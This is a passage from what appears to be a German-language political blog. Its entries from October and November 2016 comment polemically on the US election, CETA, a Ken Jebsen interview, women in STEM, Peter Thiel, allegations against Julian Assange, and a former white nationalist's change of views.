Das liegt daran, dass diese Vorschläge nicht mehrheitsfähig sind, im Moment jedenfalls. Ich weiß nicht, ob ihr das merkt, aber je mehr ihr jetzt rumheult wie trotzige Kleinkinder, desto weniger mehrheitsfähig werden eure Vorschläge. Vielleicht wenn ihr es mal mit inhaltlichen Argumenten statt mit Guilt Tripping und Snowflaking versucht?
Update: Aber Fefe, was wenn Polizei und Justiz korrupt sind? Dann sind sie das nicht erst seit der Wahl von Trump / der AfD, und das hätten wir schon viel länger nicht dulden dürfen. Im Übrigen: Sheriff Joe Arpaio booted from office by Arizona voters.

Wed Nov 9 2016

[l] Eine Sache noch. Trump hat jetzt die ganzen Verrückten am Bein, die seine Wahlversprechen für bare Münze genommen haben. Es gab da diesen Typen, der angekündigt hat, mit seiner Waffe nach Washington zu kommen, wenn Trump jetzt keine Mauer baut. Ich glaube, dass Trump das nicht mitgeschnitten hat, was für Leuten er da Versprechungen gemacht hat, und dass die das jetzt auch nachdrücklich einfordern werden.
Und dann gibt es da noch die "Jail Hillary Now"-Crowd.

Tue Nov 8 2016

[l] Kennt ihr Chris Rock? Der hat vor vielen Jahren eine Comedy-Routine über Bullet Control gemacht. These: Nicht die Schusswaffen sind das Problem, sondern dass Munition zu billig ist. Wenn eine Kugel $5000 kostet, dann würden keine unschuldigen Passanten angeschossen, weil es sich niemand leisten könnte.
Kennt ihr? Gut. Dann lest mal diese aktuelle Story über die US Navy. Money Quote:
The U.S. Navy can't fire its awesome new gun that can hit a target more than 70 miles away because the rounds are costing the service nearly a million bucks a piece.
Eine Million Dollar pro Schuss! Wow. Wieviel Munition haben die denn so geladen?
It's also one of the most expensive, with the price of each round costing roughly $800,000 to $1 million, for a total cost of around $2 billion if the service purchased its planned buy of 2,000 rounds, Sam LaGrone of USNI reported.
Holla! Zwei Milliarden hier, zwei Milliarden da, nach einer Weile kommt da richtig Geld zusammen!1!! (Danke, Magnus)
[l] Der Kampf gegen die Steueroasen scheitert am Widerstand … der Steueroasen.
Einer dieser Punkte ist demnach die Frage, ob Staaten mit einem Steuersatz von null Prozent für Unternehmen grundsätzlich auf ihre Rolle in "allgemein bekannten Steuervermeidungspraktiken" hin untersucht werden sollen oder nicht.
Das irritiert ein bisschen, denn selbst Luxemburg und Malta haben eine Körperschaftsteuer, auch wenn man die dann in der Praxis runtertricksen kann.
Auch über eine verpflichtende Transparenz bei wirtschaftlich Berechtigten einer Gesellschaft in den jeweiligen Ländern wurde gestritten.
Ah, hier geht es ans Eingemachte.
ch NDR-Informationen sperren sich unter anderem Großbritannien, Luxemburg, die Niederlande und Malta gegen allzu strenge Kriterien.
Ja nee, klar.

Sat Nov 5 2016

[l] "Judge Issues Restraining Order Against Trump Campaign to Prevent Voter Intimidation"
Wartet, geht noch bizarrer!
Melania Trump hat angeblich Geld für Model-Jobs eingenommen, bevor sie eine Arbeitserlaubnis hatte. Yeah, Melania Trump muss jetzt auch noch schnell einen in die Fresse kriegen. Die einzige aus dem Trump-Lager, die niemandem einen Vorwand geliefert hat. DIE muss jetzt noch schnell kaputtgemacht werden!1!!
Nach der Wahl wird das wie diese Szene aus Terminator sein. Eine verbrannte, mit Totenköpfen gefüllte Wüste.
Hey, schnell, da hinten links lebt noch jemand! Schnell ne Nuke drauf werfen!

Thu Nov 3 2016

[l] Gaby Weber hat einen neuen Film gemacht: "Ein Geschenk des Himmels - wie Daimler-Benz Nazigold waschen durfte"
Und weil es Gaby Weber ist, kommen nicht nur Theorien und Mutmaßungen sondern das ist alles schön belegt. Viel Spaß beim Gucken (Laufzeit: eine knappe Stunde)

Wed Nov 2 2016

[l] Ken Jebsen hat bei den Nachdenkseiten ein Interview gegeben. Und ich muss konstatieren, dass die von mir kritisierten Punkte mit der Zeit eher noch schlimmer werden. Alleine seine erste Antwort finde ich schon einen absoluten Totalschaden. Ich zitiere das mal:
Der Unterschied zwischen uns und anderen besteht vor allem darin, dass wir in unserer Community keine Kunden sehen, sondern Menschen, die auf der Suche nach Antworten sind, die ihnen helfen, die Ohnmacht, die sie gegenüber dem System erkennen, zu überwinden.
Der Teil geht noch. Aber jetzt:
Das geht nur durch Bildung. Wer KenFM ansurft, will Wissen. Er will Zeit investieren, um sich schlau zu machen. Er will die andere Seite der Medaille sehen und hat längst begriffen, dass die Wahrheit komplex ist.
Donald Trump, bist du das? Nun, von Selbstzweifeln zerfressen wirkt er jedenfalls nicht.
Mein inhaltliches Problem an dieser Stelle ist, dass ich KenFM eher gegenteilig wahrnehme. Da geht es häufig nicht darum, Argumente auszurollen und den Zuschauer entscheiden zu lassen, sondern Jebsen knüllt seine Weltsicht und seine Bewertungen geradezu beiläufig direkt vor die nächste Frage, damit der Gegenüber das nicht groß hinterfragen kann, weil er auf die Frage antworten muss. Das ist für mich aber kein Bildungs-Ansatz, sondern genau die "hier ist meine Meinung und sie ist richtig"-Masche, die er den Mainstream-Medien vorwirft.
Im Übrigen teile ich auch seine These nicht, dass die Mainstream-Medien Dinge verschweigen. Das ist meiner Erfahrung nach nicht so. Die Fakten sind so gut wie alle da. Was seltener kommt sind Deutungs- und Meinungsartikel, die von der Mainstream-Position abweichen. Aber wenn man sich seine Meinung selber bildet und dabei die Fakten nur von den Mainstreammedien bezieht, dann hat man vielleicht nicht 100% Abdeckung, aber 95% oder so werden es sein. Auch unbequeme Fakten werden berichtet, aber halt häufig mit einer Deutung, die das dann für unwichtig erklärt oder als Feindpropaganda zu brandmarken versucht. Ein echter Bildungsansatz muss daher meiner Meinung nach so orientiert sein, dass er die Menschen in die Lage verletzt, die Fakten von den Meinungen trennen zu können.
Und das tut Jebsen gerade nicht. Ich mache das schon an so trivialen Dingen fest wie dass er seine Behauptungen nicht als Hypothese kennzeichnet, sondern einfach raushaut, als sei das die Wahrheit.
Damit kann man umgehen, wenn man ordentlich geschult ist. Aber diese Schulung ist ja genau, was KenFM als Eigenleistung hochhält. Das kann ich so nicht erkennen.
Die Art, wie wir Inhalte präsentieren, ist deutlich frischer als bei ARD und ZDF oder FAZ und SPIEGEL. KenFM hat keine Kunden. Wir haben Fans, Menschen, die hinter uns stehen, wie man das von Bayern-München-Freunden kennt. Diese Haltung kommt nicht von ungefähr, sondern hat mit Fair-Play zu tun. Propaganda, wie sie andere betreiben, ist nicht Fair-Play, sondern ein klares journalistisches Foul.
Was ist das denn bitte für ein PR-Bullshit-Bingo-Scheiß?! WTF? Sorry, ab hier ist es bei mir vorbei mit dem Wohlwollen. Wenn ich mit PR-Hohlphrasen bombardiert werden wollte, kann ich mir eine Dauerwerbesendung reinziehen. Dieser Absatz und die nächsten lesen sich, als seien sie von einer Werbeagentur zusammengekokst worden. Mich stößt das ab. Was hat sich Ken bloß dabei gedacht?! Und dann sowas hier:
Presse hat Besitzer und vertritt private Interessen. Kein Intendant kommt auf den Chefsessel, wenn er politisch nicht embedded ist.
"embedded" ist bei Ken Jebsen so eine Art Kampfbegriff. Wer ihn häufiger hört oder liest, der kennt das schon. Ein In-Joke, bei dem sein Stammpublikum gähnt und den neues Publikum nicht versteht. Was für ein Griff ins Klo. Aber geht noch weiter:
Wir bekommen daher einen extrem starken Kunden
Wie jetzt, direkt davor schreibt er noch, dass er keine Kunden hat, nur Fans. Da sind wohl die Hohlphrasen leicht verrutscht beim ablesen?
und haben es mit einem Aufschaukelungsprozess zu tun, der nicht berechenbar ist. Warum nicht? Weil wir nicht mit einer linearen Entwicklung zu tun haben, sondern die exponentielle Kurve die Entwicklung eher beschreibt. Dieser Prozess ist unumkehrbar. KenFM ist Teil und Ausdruck eines digitalen Aufwachzimmers in einer global vernetzten Welt.
Hier ist für mich das Bullshit-Maß voll. Mehr Bullshit bin ich nicht zu tolerieren bereit und breche die Lektüre ab.
Warum machen Leute sowas? Steigt ihm der Erfolg in seiner Echokammer zu Kopf?
Was mich besonders irritiert: Normalerweise kann man sowas ja abtun mit "naja, die werden ihm halt das Wort im Mund umgedreht haben, ihn vielleicht fehlzitiert haben, wichtige Dinge ausgelassen oder so", aber ich habe ja neulich dem selben Interviewer bei den Nachdenkseiten auch ein Interview gegeben und glaube das daher ausschließen zu können.
Eine Sache möchte ich trotzdem hier ganz explizit ansagen: Selbst wenn man Ken Jebsen für einen Schaumschläger oder einen Idioten hält, ist das trotzdem kein Grund, nicht seine Interviews mit anderen Leuten zu rezipieren und auf sie zu linken. Ich werde weiterhin auf ihn linken, und das heißt nicht, dass ich mir das zueigen mache. KenFM ist genau so eine Quelle wie andere Quellen. Man muss sich die Fakten selber rauspopeln, man darf die Bewertung der Dinge nicht anderen überlassen, und man prüft wilde Behauptungen nach. Dann ist KenFM nicht schlechter als andere Quellen, eher besser (weil eben auch Leuten eine Stimme gegeben wird, die in der ARD nicht zu Wort kommen würden).
Update: Einen noch. Was mich bei dieser Sache echt kaputt macht, ist dass ich bei Ken genau so wie bei ARD-Journalisten nicht glaube, dass die irgendwas davon böse meinen. In deren Weltsicht sind die alle die Guten. Die ARD-Journalisten in der Atlantikbrücke genau wie Ken Jebsen. Alle glauben von sich selbst, dass sie die letzten wahren Verfechter der güldenen Ideale sind, dass sie die letzten sind, die sich noch wirklich um die Menschen da draußen kümmern, und ohne mich wäre ja alles total verloren! Und dann verprellen sie ihre Zuschauer, Hörer und Zuschauer mit solchen öffentlichen Zuschaustellungen ihrer Arroganz. Das ist in jeder Hinsicht tragisch. Wie so eine griechische Tragödie, wo du von Anfang an sehen kannst, dass das alles nicht gut enden wird, aber du bist machtlos, was am Ausgang zu ändern. Sehr traurig.
Aber es gibt ja immer Hoffnung. Nie die Hoffnung verlieren.
Update: Weil das bei ein paar Leuten so ankam: Nein, ich bin jetzt nicht „verfeindet“ mit Ken, ich halte ihn auch nicht für doof oder gar bösartig. Aber dieses Interview hat er verkackt, sorry. Was seid ihr denn für „Freunde“ von ihm, wenn ihr Feedback von ihm fernhalten wollt? Wie soll der denn besser werden, wenn ihm das niemand sagt?! Ich erwarte von meinen Freunden ganz sicher, dass sie mir sagen, wenn ich mich gerade verrenne oder einen Fehler gemacht habe. Ich bin mir sicher, Ken sieht das auch so.

Mon Oct 31 2016

[l] PSA: Star-Trek-Witze sind jetzt auch verboten, weil sie Frauen ausschließen. Nein, wirklich! Nur Männer gucken Star Trek, das weiß ja wohl jeder! Wo man auch hinguckt, Männer, Männer, überall Männer!1!! Das Scifi-Universum mit dem ersten weiblichen Raumschiff-Captain? Überhaupt das erste Mal, dass eine Frau in einer führenden Offiziersrolle gezeigt wurde? Und die war auch noch schwarz und schrieb dann mit einem Kuss zwischen einem Weißen und einer Schwarzen TV-Geschichte? In Star Trek, übrigens. Nicht zufällig die gleiche Frau woanders.
Erinnert sich eigentlich noch jemand, was das Argument dafür war, wieso wir seit Jahrzehnten diesen ganzen Aufwand treiben, um mehr Frauen in die STEM-Felder zu kriegen? Ich erinnere mich da nämlich nicht dran. Ich sehe immer nur "Wenn wir mehr Frauen in die STEM-Felder kriegen wollen, müssen wir auch noch $foo und $bar machen". Seit ich denken kann, in der Schule, zu Uni-Zeiten, immer. Was ist dafür eigentlich das Argument? Da haben inzwischen Menschen eine Karriere draus gemacht, irgendwelche mehr oder weniger fundierten Aussagen zu treffen, was man alles tun müsste, um mehr Frauen in die STEM-Felder zu kriegen. Und wir haben auch immer mehr Frauen in den STEM-Feldern. Ist dadurch jetzt irgendwas besser geworden? Schöner? Gerechter? Sind jetzt mehr Menschen glücklich? Das ist keine rhetorische Frage. Ich kenne "wir müssen mehr Frauen in die STEM-Felder kriegen" immer nur als unhinterfragte Prämisse. Die Herleitung fehlt mir.
Ich finde das völlig in Ordnung, wenn verschiedene Leute verschiedene Dinge gerne machen. Ich für meinen Teil bin echt zufrieden, dass ich keinen Pflegeberuf machen muss. Andere lieben das. Wieso muss man jetzt den Anteil der Leute, die das nicht mögen, erhöhen? Was ist daran gerechter, wenn am Ende Leute, die das gerne machen, es nicht machen können, weil man künstlich den Anteil der anderen erhöhen wollte?
Gibt es in der Biologie Leute, die den Professorinnen untersagen wollen, über Gefühle zu reden, weil das angeblich Männer abstößt, und die sich dann nicht inkludiert fühlen?
Überhaupt, dieses "ich fühle mich hier nicht inkludiert". Ich kann es nicht mehr hören. Was ihr gerade erlebt, nennt man Leben. Niemand ist grundsätzlich überall willkommen. Damit umzugehen zu lernen ist Teil des Erwachsenwerdens. Wenn ihr DAS schon Scheiße findet, dann wartet mal, bis ihr mit dem Finanzamt interagieren müsst!
Ich kann dieses Winseln echt nicht mehr hören. Als ob das Leben irgendjemandem was schuldet an der Stelle!
Niemand hält Frauen vom STEM-Studieren ab, im Gegenteil. Und ich kann euch aus meiner Erfahrung sagen, dass ich mich auch nicht willkommen fühlte in einigen der Pflichtvorlesungen, die wir damals belegen mussten. Am Semesterende hatte sich das Publikum bei vielen Grundstudiums-Vorlesungen gegenüber dem Semesterbeginn mehr als halbiert. Das Phänomen gibt es auch heute noch. Studenten werden rausgesiebt. Es gibt da keine Inklusion, und mit dem Geschlecht hat das nichts zu tun.
Ein Studium ist kein Jodeldiplom. Da geht man nicht hin und kriegt ein Bullshit-Zertifikat für die regelmäßige körperliche Anwesenheit. Jeder kann mitmachen, aber für einen Abschluss muss man nachweisen, dass einem das Gebiet wichtig genug ist, dass man ein paar Jahre Gegenwind aushalten kann. Und das ist auch gut so. Sonst würde ein akademischer Abschluss noch weniger aussagen.
Ich erinnere mich an Vorlesungen zu meinen Studienzeiten, wo am Ende noch alle Frauen übrig waren, aber von den Männern nur die Hälfte. Hört mir also auf mit "die armen schwachen Frauen". Die Frauen, die das wirklich machen wollen, die sind zäher und fitter als die Männer, die nur mal vorbeischnuppern wollten und dann beim ersten Gegenwind das Studium abbrechen. Die ganzen "ach so schwer wird das schon nicht sein, ich habe schließlich Playstation-Erfahrung"-Männer fliegen genau so aus wie die ganzen "ach die werden mich schon durchlassen, wenn ich nett lächele und immer pünktlich komme"-Frauen.
Zurück zu diesem Artikel. Hier ist, was sie konkret vorschlagen:
The department added art and nature posters throughout their building to make it more inviting. Women were appointed as teaching assistants in many courses. Professors sent personalized emails recognizing women who received high grades in introductory courses. These emails defined success as getting good grades, rather than whether one plays video games or knows science fiction references.
Also erstens: Auch bei uns im Institut hing Kunst an den Wänden, gab es weibliche Professoren und Tutoren, sogar ein Tutorium reserviert nur für Frauen. Also alles, was die da vorschlagen, bis auf die motivierenden E-Mails und Blümchenwiese-Poster.
Aber: Hat mal jemand untersucht, ob die höhere Frauenquote vielleicht an daran liegt, dass Männer kein Bock auf so ein Blümchenwiese-Umfeld haben und geflüchtet sind?
Was ist eigentlich der nächste Schritt, wenn wir dann den Frauen über so Tricks und Lügen ("Ihr Anruf ist uns sehr wichtig, bitte bleiben Sie dran!" und "Liebe Charlotte, Ihre Leistungen in dieser Klausur waren gaaaanz toll!" wirken auf mich ähnlich abstoßend. Was ist das hier, Kindergarten?! Krieg ich jetzt auch noch ein goldenes Sternchen in meine Hausaufgabe geklebt?) zu einem Abschluss verhelfen. Was wenn die dann über Frauenquote einen Job irgendwo kriegen. Was wenn da keine Naturposter an den Wänden hängen, und niemand dafür abgestellt wird, motivierende E-Mails an die Mitarbeiter zu verschicken? In der Uni kriegen wir vielleicht noch so eine Gummizellen-Umgebung hin, aber dann sind die halt alle an ihren Arbeitsplätzen unglücklich? Und dann ist es zu spät, noch schnell was anderes zu studieren?
Bitte erkläre mir mal jemand, wo mein Denkfehler ist.
Einen noch. Schon jetzt hört man aus der Wirtschaft seit vielen Jahren, dass die Uni-Absolventen zum Gutteil völlig unbrauchbar sind, weil die Unis mehr darauf geachtet haben, dass sich Studenten inkludiert fühlen, als dass sie was lernen. Was ist denn hier die Zielvorstellung? Auf was genau arbeiten wir hin? Was ist das, was uns wichtig ist? Ist es das wertlose Zertifikat? Dann sparen wir uns doch einfach das Studium und verteilen die Zertifikate einfach mit dem Abi gleich mit. Dann fühlen sich alle inkludiert, die ein Abi geschafft haben. Und im nächsten Schritt können wir das auch in der Fußgängerzone verteilen. Inkludierender geht es kaum!
PS: Ich war in Chemie immer eine Lusche. Ab dem Moment, als sie diese Summenformel erklärten, und dann, dass die eigentlich Scheiße ist, weil Stoffe mit verschiedenen chemischen Eigenschaften die gleiche Summenformel haben können. Da habe ich abgeschaltet. Hätte man mich jetzt mit Inklusionstricks an Chemie binden können? Klar! Wäre ich da glücklich geworden? Nein.
Update: Damit das hier nicht nur schlechte Laune verbreitet: Star Trek hatte nicht nur Einfluss auf Technik, sondern auch auf Mode!

Fri Oct 28 2016

[l] Trump hat innovative Vorstellungen zur Demokratie-Effizienzsteigerung.
Und stimmt ja irgendwie auch. Wieso halten wir uns mit diesem Wahlscheiß auf? Wir haben ja schon in der Justiz Effizienz zum Maßstab gemacht, wieso nicht auch gleich im Rest der Demokratie? Kostet doch alles bloß Geld! Das Geld könnte man viel besser anlegen! Als zusätzlichen Reichtum bei den 0,1% zum Beispiel!

Thu Oct 27 2016

[l] Die Belgische Regierung sagt, die hätten sich bzgl CETA mit den abtrünnigen Regionen ein Einigung herbeiführen können. Damit stünde CETA nichts im Wege.
Wie auch. Die Bevölkerung wurde ja nicht gefragt.
Übrigens, wo wir gerade bei CETA waren. Der Magnette hatte in der Libération in einem Interview erklärt, dass die Kanadier überhaupt nicht auf den Schiedsgerichten beharren, im Gegenteil. Das ist eine Forderung der EU-Kommission, nicht der Kanadier. Die Kanadier haben mit Schiedsgerichten schon bei NAFTA schlechte Erfahrungen gemacht.

Sun Oct 23 2016

[l] Hey, bei dieser Wallonie-vs-CETA-Geschichte, da habt ihr euch sicher was ausgemalt, ein Bild vor Augen. Dieser Regionalpolitiker da, der CETA im Weg steht gerade. So ein dickschädeliger französischsprachiger Bauerntölpel vielleicht. Eine Gerard Depardieu-Figur vielleicht. Höflich, rundlich, bisschen doof, ein Relikt aus vergangenen Zeiten, als Gewerkschaften noch was zu sagen hatten. Ja? Bin ich nah dran?
Nun, dann lest euch doch mal durch, mit wem wir es bei Paul Magnette wirklich zu tun haben. Ich spoiler mal ein bisschen
A suave, Cambridge-educated former professor of EU constitutional law at the Université Libre de Bruxelles, […]
Magnette was a European affairs scholar long before he was a politician. He specialized in EU constitutional issues for much of the 2000s, and European Commission President Jean-Claude Juncker tried to play on his commitment to the broader European project.
Mit anderen Worten: Das ist wahrscheinlich der Einzige weit und breit, der den CETA-Text mal durchgelesen und auch verstanden hat. (Danke, Kurt)

Sat Oct 22 2016

[l] Es gibt einen neuen Höhepunkt im US-Wahlkampf. Es ist ein Enthüllungsvideo aufgetaucht, das angeblich Demokraten zeigt, wie sie Anschläge auf Trump-Wahlkampfveranstaltungen planen. Also nicht Anschläge im Sinne von "wir üben Gewalt aus" sondern bezahltes Trolling. Dinge tun, bei denen sie wissen, dass Leute auf Trump-Rallys da gewalttätig werden.
Die Organisation, die das Video gemacht hat, heißt Project Veritas. Es gibt da einen "Rapid Response Director" und so weiter, und sie haben "geistig Behinderte", die dann "Dinge tun können", um Leute zum Ausflippen zu bringen. Das Problem ist: Der Typ, der das gefilmt hat, hat zuvor schon vollständig erstunkene und erlogene "Enthüllungsvideos" zu Planned Parenthood und ACORN gemacht, die allerdings trotzdem sehr erfolgreich darin waren, als Vorwand für die Republikaner im Congress zu dienen, um ACORN und Planned Parenthood die Gelder zu streichen. Der Typ ist aber vollständig diskreditiert, dem glaubt niemand mehr irgendwas.
Und die Washington Post versucht auch nach Kräften, die Vorwürfe zu entkräften. Allerdings ist die Washington Post seit der Übernahme durch Amazon-Gründer Jeff Bezos ein Democrat-Partisanen-Wahlkampfblatt geworden. Womit sie aber Recht haben, ist dass die Trump-Stiftung diesen Filmemacher finanziell unterstützt hat — man könnte also sagen, diesen Schmierfilm in Auftrag gegeben hat.
Wem soll man jetzt glauben? Hier ist die Analyse von Politifact, einer unabhängigen Fact-Checking-Bude. Zerohedge hat ein paar mehr Details zu den Protagonisten in dem Video rausgekramt, die auch nicht sonderlich gut aussehen. Unter dem Strich bleibt aber als Anschuldigung nur übrig, mit "Planned Parenthood"-T-Shirts zu einer Trump-Rally zu gehen, oder mit "Trump is a Nazi"-Shirts, und dann zu warten, bis einer der gewalttätigen Psychopathen durchdreht. Das ist jetzt vielleicht nicht nett, aber verboten ist es auch nicht. Sozusagen die Offline-Variante von 4chan.

Thu Oct 20 2016

[l] Achtung, jetzt kommt eine Klatsch&Tratsch-Meldung :-)
Vor ein paar Tagen ging die Meldung rum, dass Peter Thiel 1,25 Mio Dollar an Trump gespendet hat. Thiel ist einer der Ur-Investoren von Paypal und hat mit dem Erlös einen Hedgefonds gegründet, der heute mehrere Milliarden Dollar verwaltet. Er hat auch Palantir gegründet, eine Geheimdienst-Zulieferer-Tech-Bude im Silicon Valley. Der Mann ist also in jeder Hinsicht auf der falschen Seite.
Vor einer Weile hat er Schlagzeilen gemacht, weil er Hulk Hogans Gerichtsverfahren gegen Gawker finanziert hat, was letztendlich zur Insolvenz von Gawker geführt hat.
Eine illustre Person, dieser Thiel. Er sitzt übrigens auch im Aufsichtsrat von Facebook und Y-Combinator (so eine unsägliche Startup-Finanzierungs-Investorengruppe und die Quelle von einer unerträglichen Flut an kult-ähnlicher Startup-Verbrämung).
Die haben jetzt einen bösen Brief von Ellen Pao gekriegt, dass sie keinesfalls mit Y-Combinator in Zukunft irgendwelche Projekte machen wolle, weil Thiel und Trump und überhaupt. Nun ist Ellen Pao das letzte Mal in den News gewesen, als sie nach einem Shitstorm bei Reddit kündigte, und davor weil sie bei Kleiner Perkins kündigte und erfolglos wegen Diskriminierung klagte. Bei ihrem neuen Projekt geht es darum, mehr Frauen in die Tech-Branche zu kriegen. Mir ist ja nicht klar, wo da jetzt die konkrete Drohung ist, nicht mehr mit Y-Combinator arbeiten zu wollen. Das klingt mir eher so, als wenn ihr Projekt Y-Combinator fürs Gelingen braucht als anders herum.
Warum erzähle ich das alles? Weil das auch Druck auf Facebook ausgeübt hat, sich mal in der Causa Thiel zu äußern. Und Mark Zuckerberg hat sich firmenintern geäußert. Er argumentiert im Wesentlichen, dass man nicht für Inklusivität sein kann, und dann die Hälfte des Landes diskriminieren, weil sie die andere politische Ansichten haben. Money Quote:
There are many reasons a person might support Trump that do not involve racism, sexism, xenophobia or accepting sexual assault.
Und davor macht er einen Punkt, der mir auch sehr wichtig ist:
We care deeply about diversity. That's easy to say when it means standing up for ideas you agree with. It's a lot harder when it means standing up for the rights of people with different viewpoints to say what they care about. That's even more important.
Wer hätte gedacht, dass ich nochmal mit Mark Zuckerberg einer Meinung sein würde.

Tue Oct 18 2016

[l] Ich frage mich, wie wohl Obamas Erbe sein wird. Wie wird der in die Geschichtsbücher eingehen? Eher positiv, glaube ich. Ja, er ist ein Drohnenmörder, ja, er hat Guantanamo nicht zugemacht, ja, das Land bröselte unter seiner Ägide vor sich hin und zerriss sich in einer Gewaltspirale der Mass Shootings. Ja, er hat viel der Entspannung mit Russland wieder rückgängig gemacht.
Auf auf der anderen Seite ist eine Menge davon den Blockade-Republikanern im Parlament zuzuschreiben. Obama hat die Beziehungen mit Kuba und dem Iran entspannt und Israel auf diplomatischem Wege von Militärschlägen abgehalten. Das sind alles Dinge, die vorher nicht sonderlich realistisch aussahen.
Ich denke mal, im Vergleich zum letzten "guten" Präsidenten davor, Bill Clinton, sieht Obama eher besser aus. Clinton ist für die Deregulierung der Zockerbanken verantwortlich und damit für die Finanzkrise, die Obama auszulöffeln hatte. Ich glaube, Obama wird als einer der besten Präsidenten der Neuzeit in die Geschichte eingehen. Nicht zuletzt wegen Obamacare.
[l] Oh es gibt noch eine andere Erklärung dafür, wieso Ecuador Julian Assange den Internetzugang zugemacht hat. Heise erwähnt es am Rande:
Nach einer anderen Lesart könnten Ermittlungen auf den Bahamas dazu geführt haben, dass Assanges Internet-Kommunikation gekappt oder gar seine Rechner einkassiert wurden. Über eine Dating-Plattform für Frauen soll Assange eine Frau kennengelernt und ermutigt haben, ihre acht Jahre alte Schwester an einem Sex-Chat zu beteiligen.
WTF, Julian! Genauere Details gibt es hier:
On September 28 this year a Canadian family holidaying in the Bahamas reported to the police that their 8-year-old daughter was “sexually molested online” by Assange on Toddandclare.com, including propositioning her “to perform oral and anal sex acts.” She was presumably accessing the site through her 22-year-old sister’s account. Whether these chats were recorded or not isn’t clear but the family claims they identified Assange.
Nun, wie üblich bei solchen Anschuldigungen: Es gilt die Unschuldsvermutung. Wer den Amerikanern im Weg steht, gegen den gibt es eben sexuelle Vorwürfe, das benutzen die ja auch gegeneinander im Wahlkampf.
Ich für meinen Teil finde ja ausgesprochen unterhaltsam, wie sich die Allianzen ändern mit der Zeit. Die Republikaner fanden Wikileaks anfangs toll, als es gegen andere korrupte Regimes ging, dann war Wikileaks der Antichrist, als sie US-Geheimnisse aufdeckten, und jetzt ist Wikileaks wieder der beste Freund, weil es gegen Hillary geht. Trump hat sich ja im Wahlkampf sogar zu einem "I love Wikileaks" hinreißen lassen. Mal sehen, wie lange das hält. Ich tippe: Bis Wikileaks ein paar E-Mails aus dem Trump-Camp leakt. :-)
Update: Wikileaks hat eine Timeline veröffentlicht.
Ich kann das jetzt nicht beurteilen, aber dass das aus Wikileaks' Timeline-Perspektive wie eine lupenreine Geheimdienstaktion aussehen würde, war irgendwie klar. Auf der anderen Seite kann ich mir nicht vorstellen, dass Julian auf seiner letzten Lebenslinie irgendwas machen würde, was seinen Internetzugang gefährden würde. Und wenn es im Internet an irgendwas keine Knappheit gibt, dann an Pornographie. Wenn es also ein Bedürfnis gibt, für das Julian im Internet kein Risiko (außer Malware-Einfangen) eingehen muss, dann wäre es das. Das passt alles nicht.
Update: Ein Hinweis noch. Wenn jemand behauptet, die Gegenseite in einem Video wiedererkannt zu haben, solltet ihr immer diese Forschungsergebnisse denken. Oh und wenn es jemanden gibt, der den Wert von Privatsphäre verstanden hat, und von dem ich nicht glauben würde, dass er mit irgendwelchen Leuten im Internet Videochats macht, und dabei kompromittierende Beweismittel hinterlassen würde, dann ist das Julian Assange. Besonders wenn es um Sexvorwürfe geht. Solche haben ihn ja in seine aktuelle Situation mit der Botschaft gebracht.

Mon Oct 17 2016

[l] Tut mir mal bitte alle einen Gefallen, nehmt euch eine Stunde Zeit, und lest diese faszinierende Geschichte hier über den Sohn des Stormfront-Gründers. Wem das nichts sagt: Das ist eine Neonazi-Webseite in den USA, die auch bei uns schon die Exekutive und Justiz beschäftigt hat und auch als Vorwand für Internetzensurbestreibungen herhalten musste.
Der Sohn von dem Betreiber dieser Webseite ist schon in frühester Kindheit in den Sog dieser White Nationalists und KKK-Leute geraten und hat sogar eine "Stormfront für Kids"-Webseite gemacht und war bei Nickelodeon zu Gast und so. Eine Ikone der Bewegung, und ihre Hoffnung als nächster Führer, denn er hatte neue Ideen wie die des "White Genocide", dass die Zuwanderung die Weißen so ausdünnen würde, dass man das als Völkermord bezeichnen könne. Dieses Mem ist seit er es erfunden hat relativ stark geworden und ist heute sozusamen Mainstream unter den Rechtsaußen-White-Power-Spinnern.
In dem Artikel geht es jetzt darum, dass er nicht aus Angst zu der Ideologie kam, sondern in ihr aufwuchs, und dadurch auf der einen Seite weniger hinterfragte, aber auch mehr hinterfragen konnte. Als er älter wurde, ging er an ein "liberal arts college", eine geisteswissenschaftliche Uni, um dort Mittelalter-Geschichte zu lernen. Das Ziel war, seine rassistischen Prinzipien durch Faktenwissen zu untermauern. Doch dann kam es alles ein bischen anders.
Ich empfehle diese Geschichte deswegen, weil ich hier schon mehrfach meine Hoffnung geäußert habe, dass man auch stramme Ideologen nicht ausgrenzen sollte, sondern mit ihnen reden sollte, weil man sie möglicherweise umstimmen kann. Wie hoch die Wahrscheinlichkeit dafür ist, darüber kann man streiten. Aber wenn man sie ausgrenzt, ist die Wahrscheinlichkeit Null.
In dieser Geschichte geht es dann so weiter, dass die an dem College herausfinden, wer er ist, und dann gibt es natürlich eine Hassmob-Debatte, wie man mit so jemandem umgehen soll. Seine Freunde an dem College, denen er nie etwas gesagt hat von seinen Ansichten, fühlen sich verraten, unter ihnen ein Einwanderer aus Peru und ein orthodoxer Jude. Aber die springen über ihren Schatten und der Jude lädt ihn zu einem Schabbat-Kreis ein. Erst bleiben die meisten anderen Gäste fern, aber das legt sich wieder, und so wird dieser Mann der Reihe nach mit Gegenargumenten gefüttert, die seine radikalen Positionen widerlegen und unterminieren.
Oh, der höhere IQ ist gar nicht auf die weiße Hautfarbe zurückzuführen? Na sowas! Ganz primitives Zeug, aber hey, man muss halt irgendwo anfangen.
Diese Geschichte ist auf eine Art ein modernes Märchen zu meiner These, dass man Menschen umstimmen kann, wenn man mit ihnen redet. Money Quote:
Matthew decided his best chance to affect Derek’s thinking was not to ignore him or confront him, but simply to include him. “Maybe he’d never spent time with a Jewish person before,” Matthew remembered thinking.
Und was soll ich euch sagen, genau das war der Fall.
He was taking classes in Jewish scripture and German multiculturalism during his last year at New College, but most of his research was focused on medieval Europe. He learned that Western Europe had begun not as a great society of genetically superior people but as a technologically backward place that lagged behind Islamic culture. He studied the 8th century to the 12th century, trying to trace back the modern concepts of race and whiteness, but he couldn’t find them anywhere. “We basically just invented it,” he concluded.
[l] Brandbombenanschlag auf Republikaner-Wahlkampfbüro in North Carolina. Es scheint eine Art Molotov-Cocktail gewesen zu sein. Und an die Wand des Nachbargebäudes haben sie Folgendes geschmiert:
A swastika and “Nazi Republicans get out of town or else” were spray painted on the side of an adjacent building.
Nur falls jemand sich Illusionen gemacht hat, dass nur die Rechten einen heiligen Krieg gegen Demokratie und Menschenrechte führen.

Fri Oct 14 2016

[l] Kurze Durchsage der Polizei in Sachsen (ja, SCHON WIEDER Sachsen!):
Im Laufe des Tages wurde der Mann trotzdem vorerst aus dem Polizeigewahrsam entlassen. „Es bestanden keine dringlichen Haftgründe“, so Sprecher Loepki.
